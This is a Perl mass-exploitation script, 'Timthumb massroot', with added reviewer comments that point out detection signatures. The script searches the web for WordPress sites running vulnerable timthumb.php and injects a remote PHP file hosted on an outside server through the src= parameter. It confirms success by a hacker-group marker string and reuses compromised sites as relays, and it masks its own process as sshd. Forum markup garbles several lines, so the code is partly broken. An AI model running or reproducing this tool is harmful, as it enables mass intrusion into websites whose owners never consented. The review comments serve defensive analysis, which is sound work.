#!/usr/bin/perl

# MODULES
#use strict;
#use warnings;
use IO::Socket;
#use IO::Socket::SSL;
use URI::_foreign;
use URI::_generic;
use URI::_query;
use URI::https;
use URI;
use LWP;
use LWP::Simple;
use LWP::UserAgent;
use LWP::Protocol::http;
use URI::http;
# use MIME::Base64::Perl;
use MIME::Base64;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use HTML::Parser;
use Parallel::ForkManager;
use IO::Socket;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use Getopt::Long;
use Time::HiRes qw(gettimeofday);
if (@ARGV == 0){&usage();}   # no arguments at all: print the option summary and exit
#my $url = "http://w...content-available-to-author-only...a.de/";
# Remote URL later handed to each probed target as the `src=` query value in
# check()/check2(); the host is redacted in this listing.
my $expl = "http://f...content-available-to-author-only...e.de/pictures.php";
# Local file whose lines check() appends to every candidate URL.
my $injects = "injects";
# Not referenced anywhere else in this listing.
my $pathfile="paths";

# Defaults that the -h / -t options below override. Both are strings;
# $maximumprocess is passed unchanged to Parallel::ForkManager as the fork limit.
my $hostfile="words.txt";
my $maximumprocess="100";

# Original program name is saved in a package global; nothing below reads it.
our $self=$0;
my $hiddenprocess='/usr/sbin/sshd';

# Process-name masquerading: $0 (argv[0]) is rewritten to an sshd-looking name
# padded with 16 NUL bytes, so on platforms where Perl can rewrite the argv
# area, `ps`-style listings show sshd instead of this script.
# NOTE(review): this runs before GetOptions, so a -hide value parsed below only
# changes $hiddenprocess, not the already-set $0. Detection: compare the command
# line a process reports with its actual executable (e.g. /proc/<pid>/exe on
# Linux) — the interpreter binary is unchanged by this trick.
$0="$hiddenprocess"."\0"x16;;

# Option table. `help` and `x` are callbacks invoked *during* parsing, so -x
# starts the scan immediately with whatever options precede it on the command
# line. $localfile is never declared or used elsewhere in this listing
# (strict/warnings are commented out at the top of the file).
GetOptions(
        'h=s'    => \$hostfile,
        'l=s' => \$localfile,
        't|threads=s'      => \$maximumprocess,
        'help'        => \&usage,
        'hide=s'                => \$hiddenprocess,
        'x' => \&start,

);



# Print the option summary to STDOUT and exit the process. Registered as the
# GetOptions `help` callback and also called when the script gets no
# arguments. The -l option accepted by GetOptions is not listed here.
sub usage {
print ("        [+]Timthumb massroot
        -h host file (default words.txt)
        -t|threads (default 100)
        -help u are looking at it
        -hide hidden process (default /usr/sbin/sshd)
");
exit;
}

# Entry point triggered by the -x option: forks one worker per line of
# $hostfile (at most $maximumprocess concurrent children) and runs google2()
# on each host string, then waits for every child to finish.
sub start {
print "[" . scalar localtime(time) . "][STARTED MASS ROUTING WITH $maximumprocess THREADS]\n\n";
        # Indirect-object constructor syntax; the limit comes from -t/--threads.
        my $forkmanager = new Parallel::ForkManager($maximumprocess);
                # Two-argument open with the return value unchecked: a missing
                # host file is silent and the loop below simply never runs.
                open(my $hosth, "<" . $hostfile);
                    while (<$hosth>) {
                        my $host = $_;
                        $host =~ s/\x0a//g;   # strip LF; the chomp below is then a no-op
                        chomp($host);
#                       print $host . "\n";
                # In the parent start() returns the child pid (true) and `next`
                # moves on to the next host; the child falls through, runs
                # google2() and exits via finish().
                my $processid = $forkmanager->start() and next;
                        &google2($host);
                        $forkmanager->finish();

                }
                # $hostfileh is not the handle opened above ($hosth); with
                # strict off this silently closes nothing.
                close($hostfileh);
                $forkmanager->wait_all_children();
} #end start


# Worker body (runs inside a forked child). Queries a JSON image-search
# endpoint for `timthumb.php site:<key>` through a relay picked from
# proxy.txt, collects every URL in the response, and dispatches each unique
# one to check2() (direct timthumb.php URL) or extract() (site root to crawl
# for theme/plugin directories). The empty prototype has no effect because the
# caller uses the `&google2(...)` call form.
# NOTE(review): several array names in this listing appear as
# "[MENTION=...]name[/MENTION]" — a forum-markup artifact that replaced an
# `@`-sigiled name (and in some places the `(` before it); here it stands for
# `@googled`. The code does not compile as shown.
sub google2() {
# Pool of legacy browser User-Agent strings; one is chosen at random per
# request. Detection: these obsolete UAs (MSIE 1.5-7.0b, Netscape 3/4,
# Konqueror 3.1, plus the fixed "Opera 7.01 [en]" string used elsewhere in
# this file) requesting wp-content paths are a usable log signature.
my @uagents   = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://w...content-available-to-author-only...r.com)","Avant Browser (http://w...content-available-to-author-only...r.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) 
Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2;U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; 
EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");
# Initial agent object; replaced further down once a random UA is chosen.
my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 15);
# Two disabled TLD lists (the garbled name stands for `@doms`); the per-TLD
# loop that used them is commented out below.
#my [MENTION=57691]dom[/MENTION]s = ("mobi","info","net","ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
#my [MENTION=57691]dom[/MENTION]s = ("biz","cat","com","coop","info","int","jobs","mobi","museum","name","net","org","travel","ac","ad","ae","af","ag","ai","al","am","an","ao","aq","ar","as","at","au","aw","az","ba","bb","bd","be","bf","bg","bh","bi","bj","bm","bn","bo","br","bs","bt","bv","bw","by","bz","ca","cc","cd","cf","cg","ch","ci","ck","cl","cm","cn","co","cr","cs","cu","cv","cx","cy","cz","de","dj","dk","dm","do","dz","ec","ee","eg","eh","er","es","et","eu","fi","fj","fk","fm","fo","fr","ga","gb","gd","ge","gf","gg","gh","gi","gl","gm","gn","gp","gq","gr","gs","gt","gu","gw","gy","hk","hm","hn","hr","ht","hu","id","ie","il","im","in","io","iq","ir","is","it","je","jm","jo","jp","ke","kg","kh","ki","km","kn","kp","kr","kw","ky","kz","la","lb","lc","li","lk","lr","ls","lt","lu","lv","ly","ma","mc","md","mg","mh","mk","ml","mm","mn","mo","mp","mq","mr","ms","mt","mu","mv","mw","mx","my","mz","na","nc","ne","nf","ng","ni","nl","no","np","nr","nu","nz","om","pa","pe","pf","pg","ph","pk","pl","pm","pn","pr","ps","pt","pw","py","qa","re","ro","ru","rw","sa","sb","sc","sd","se","sg","sh","si","sj","sk","sl","sm","sn","so","sr","st","su","sv","sy","sz","tc","td","tf","tg","th","tj","tk","tm","tn","to","tp","tr","tt","tv","tw","tz","ua","ug","uk","um","us","uy","uz","va","vc","ve","vg","vi","vn","vu","wf","ws","ye","yt","yu","za","zm","zr","zw");
my $key=$_[0];   # host / search term handed over by start()
#my $path=$_[1];
# $counter, $page, $random and $flag are declared but never used in this sub;
# this `my $url` is shadowed by the later `my $url=` inside the body.
my $counter=1;
my $page=0;
my $reqb;
my $resb;
my $random = int( rand(3));
my $flag;
# Garbled `my @googled;` — accumulates every URL discovered for this key.
my [MENTION=65778]googled[/MENTION];
my $url;

#foreach my $dom  [MENTION=57691]dom[/MENTION]s) {
#       print $dom. " Scanned\n";
#       for (my $i=0; $i<=20; $i+=10){
        # $uagent is an undeclared package global (strict is off).
        $uagent = $uagents[rand(scalar(@uagents))];
        $ua = LWP::UserAgent->new(agent => $uagent);
        # Shells out to pick one random line of proxy.txt. That is the same
        # file vuln() appends confirmed hits to, so previously compromised
        # sites are reused as relays for the search request below.
        my $proxy = `perl -MList::Util -e 'print List::Util::shuffle <>' proxy.txt | tail -n 1`;
        chomp($proxy);
#       print $proxy . "\n";
        # Image-search query `timthumb.php site:<key>`; the endpoint host is
        # redacted in this listing. Shadows the outer `my $url`.
        my $url="http://a...content-available-to-author-only...s.com/ajax/services/search/images?v=1.0&start=1&rsz=large&q=timthumb.php%20site:" .$key;
        # Empty EOL argument: single-line base64 with no trailing newline.
        my $encoded = encode_base64($url,"");
#       print "Encoded url is " . $encoded . "\n";
        sleep int(rand(5));   # 0-4 s of jitter before the request
        # The relay receives the encoded search URL as `?p=<base64>`.
        # Detection: requests of this shape to a .php file under wp-content on
        # a host you operate indicate it is being used as a relay.
        $url = $proxy . "?p=" . $encoded;
#       print "request made " . $url . "\n";
        # Re-declares $proxy after it has already been used; this new
        # variable is undef and unused (would warn under `use warnings`).
        my $proxy;
        $reqb = HTTP::Request->new("GET", $url);
        $resb = $ua->request($reqb);
        # as_string() already returns a single scalar; join is redundant.
        my $join = join("",$resb->as_string);
        # Walk every unescapedUrl field of the JSON response.
        while($join=~m/unescapedUrl":"(.*?)"/g){
        my $link=$1;
        # Hit is a direct timthumb.php URL: keep the prefix up to it.
        if ($link=~m/(.*?)\/timthumb.php\?/){
        my $direct=$1;
        $direct .= "/timthumb.php";
#       &check2($direct);
        # Garbled `push (@googled, $direct)` — the artifact ate the `(@`.
        push [MENTION=65778]googled[/MENTION], $direct)
        }
#        print $link . "\n";
        # The escaping on this line is mangled in the listing; the apparent
        # intent is to reduce $link to its host part, but as written it cannot
        # be confirmed.
        $link =~ s/\([-a-zA-Z0-9\.]+)\/\.*/\$1/\;
        $link .= "/";
        # Garbled `push (@googled, $link)` — the site root is queued as well.
        push [MENTION=65778]googled[/\MENTION], $link);

        } #end while
#       } #end for
#       my $forkmanagerb = new Parallel::ForkManager(1);
        # Dedupe via hash keys (order is not preserved).
        my %vhash   = map { $_ => 1 } [MENTION=65778]googled[/MENTION];
        my @vhostuniq = keys %vhash;
        # Status line; "Dork" and "Domain" both print $key.
        print "[" . scalar localtime(time) . "][GOOGLE][Dork: " . $key ."][Domain: " .$key ."][Found: " . scalar @vhostuniq . "]\n";
        foreach my $uni (@vhostuniq){
#                my $processidb = $forkmanagerb->start() and next;
#               print $uni . "\n";
                # Direct timthumb.php URLs are probed at once; site roots are
                # crawled for theme/plugin directories first.
                if ($uni=~m/timthumb.php/){
                &check2($uni);
                }
                else {
                &extract($uni);
                }
#               $forkmanagerb->finish();
#               $forkmanagerb->wait_all_children();
        }
        # Reset the (garbled) @googled list.
        [MENTION=65778]googled[/MENTION]=();
#       } #end foreach
} #end sub

# Fetch a site URL and harvest theme and plugin base directories
# (<site>/wp-content/themes/<t>/ and <site>/wp-content/plugins/<p>/) from the
# absolute URLs found in the response; every unique one is passed to check().
# @links is an undeclared package global (strict is off) that is never
# emptied, so it keeps growing across calls within the same worker process.
sub extract() {
my $url = $_[0];
# Fixed "Opera 7.01 [en]" User-Agent, shared with check()/check2()/vuln():
# a consistent log signature for this tool.
my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $req = HTTP::Request->new("GET", $url);
my $res = $ua->request($req);
my $join = join("",$res->as_string);   # as_string() is already one scalar
if ($join =~m/wp-content/){
# The outer `my $link` only receives the match's truth value; the matched
# text comes from $& on the next line, which shadows it.
while (my $link=$join=~ m,(http.*?://([^\s)\"](?!ttp:))+),g) {
my $link = $&;
#print $link . "\n";
if ($link =~ m,/wp-content/themes/,g){
# $1 = everything before /wp-content/themes/, $2 = theme slug. If this match
# fails (no `/` after the slug) $1/$2 keep their previous values.
$link =~ m,(.*?)/wp-content/themes/(.*?)/,;
my $site = $1;
my $theme = $2;
$link = $site . "/wp-content/themes/" . $theme . "/";
#print $link . "\n";
chomp($link);   # no-op: $link was just rebuilt without a newline
push (@links, $link)
}

if ($link =~ m,/wp-content/plugins/,g){
# Same shape as the themes branch, for plugin directories.
$link =~ m,(.*?)/wp-content/plugins/(.*?)/,;
my $site = $1;
my $plugin = $2;
$link = $site . "/wp-content/plugins/" . $plugin . "/";
chomp($link);
#print $link . "\n";
push (@links, $link)
}


} #end while extract
} #end if

# Garbled `my @Uni = &clean(@links);` and `foreach my $uni (@Uni) {` — the
# same forum-markup artifact seen elsewhere in this listing.
my [MENTION=83868]Uni[/MENTION] = &clean(@links);
foreach my $uni  [MENTION=83868]Uni[/MENTION]) {
#print $uni . "\n";
&check($uni);
}

} # end sub extract


# Return the elements of @_ with duplicates removed: the first occurrence of
# each value is kept and the original order is preserved. Callers use the
# `&clean(...)` form, which is what lets them pass arguments past the empty
# prototype.
sub clean() {
    my %seen_before;
    my @unique = grep { !$seen_before{$_}++ } @_;
    return @unique;
} # end sub clean


# For each line of the $injects file, request <attack><inject>?src=<$expl>
# and look for TimThumb's "Unable to open image : <path>.php" message, which
# discloses a server-side path under wp-content (presumably the cache
# directory); that path is rebuilt into a URL and handed to vuln().
# check2() below is the same logic without the inject loop (duplicated code).
# Detection: requests whose `src=` value is a URL on an external host, and
# responses containing "Unable to open image", are the observable pattern.
sub check() {
my $attack = $_[0];
#print "Atacking " . $attack . "\n";
        # Two-argument open, unchecked, never closed; reopened on every call.
        open(my $injectfileh, "<" . $injects);
        while(<$injectfileh>){
        my $inject = $_;
        $inject =~ s/\x0a//g;
        chomp($inject);   # no-op after the LF strip above


my $exploit = $attack . $inject . "?src=" . $expl;

# A fresh UserAgent is built on every iteration (loop-invariant work).
my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $reqe = HTTP::Request->new("GET", $exploit);
my $rese = $uae->request($reqe);
my $output = join("",$rese->as_string);   # headers + body as one string
#print $exploit . "\n";
#print $rese->as_string;
if ($output =~ m/Unable to open image/){
# $1 = the disclosed path minus its ".php"; the `.` before php is unescaped.
$output =~ m,Unable to open image : (.*?).php,g;
my $shellpath=$1;
#print $shellpath . "\n";
# Keep only the part after /wp-content.
$shellpath =~ m,/wp-content(.*),;
my $path =$1;
# The match's truth value is assigned first, then overwritten with $1:
# the site prefix up to /wp-content.
my $rooturl = $attack =~ m,(.*)/wp-content,;
$rooturl=$1;
#print $rooturl . "\n";
my $checkurl =  $rooturl . "/wp-content/" .$path. ".php";
&vuln($checkurl);
}
} # end while


} #end sub check



# Same probe as check(), but for a URL that already ends in timthumb.php:
# a single request <attack2>?src=<$expl>, then the same "Unable to open
# image" path-disclosure parsing and hand-off to vuln(). The body from the
# UserAgent construction onward is a verbatim copy of check()'s loop body.
sub check2() {
my $attack2 = $_[0];
#print "Atacking " . $attack2 . "\n";


my $exploit = $attack2 . "?src=" . $expl;

my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $reqe = HTTP::Request->new("GET", $exploit);
my $rese = $uae->request($reqe);
my $output = join("",$rese->as_string);   # headers + body as one string
#print $exploit . "\n";
#print $rese->as_string;
if ($output =~ m/Unable to open image/){
# $1 = the disclosed path minus its ".php"; the `.` before php is unescaped.
$output =~ m,Unable to open image : (.*?).php,g;
my $shellpath=$1;
#print $shellpath . "\n";
# Keep only the part after /wp-content.
$shellpath =~ m,/wp-content(.*),;
my $path =$1;
# Truth value assigned first, then replaced by $1 (site prefix up to /wp-content).
my $rooturl = $attack2 =~ m,(.*)/wp-content,;
$rooturl=$1;
#print $rooturl . "\n";
my $checkurl =  $rooturl . "/wp-content/" .$path. ".php";
&vuln($checkurl);
}


} #end sub check2


# Fetch the rebuilt URL and treat the host as compromised when the response
# contains the marker "linkirc - jambihackerlink" (presumably emitted by the
# remote file at $expl). Hits are appended to vuln.txt and also to proxy.txt,
# from which google2() picks relays for later search requests.
# Detection: that marker string inside .php files under wp-content, and
# outbound requests from the web server carrying `?p=<base64>`, are the
# indicators this listing makes visible.
sub vuln {
my $vulnurl = $_[0];
my $uae = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $reqe = HTTP::Request->new("GET", $vulnurl);
my $rese = $uae->request($reqe);
my $output = join("",$rese->as_string);   # headers + body as one string
if ($output =~ m/linkirc - jambihackerlink/i){
#print $vulnurl ." is vuln \n";
print "[" . scalar localtime(time) . "][VULN][" .$vulnurl ."]\n";

        # Bareword handle, two-argument open, return value unchecked; append mode.
        open(OUT, ">>vuln.txt" );
        print OUT $vulnurl . "\n";
        close OUT;
        # The same URL also becomes a relay entry consumed by google2().
        open(OUT, ">>proxy.txt" );
        print OUT $vulnurl . "\n";
        close OUT;

# Disabled follow-up request with a `?bot` query; left commented out.
#my $boturl= $vulnurl . "?bot";
#my $reqe = HTTP::Request->new("GET", $boturl);
#my $rese = $uae->request($reqe);
#print "bot executed for ". $vulnurl . "\n";
}

} #end sub vuln  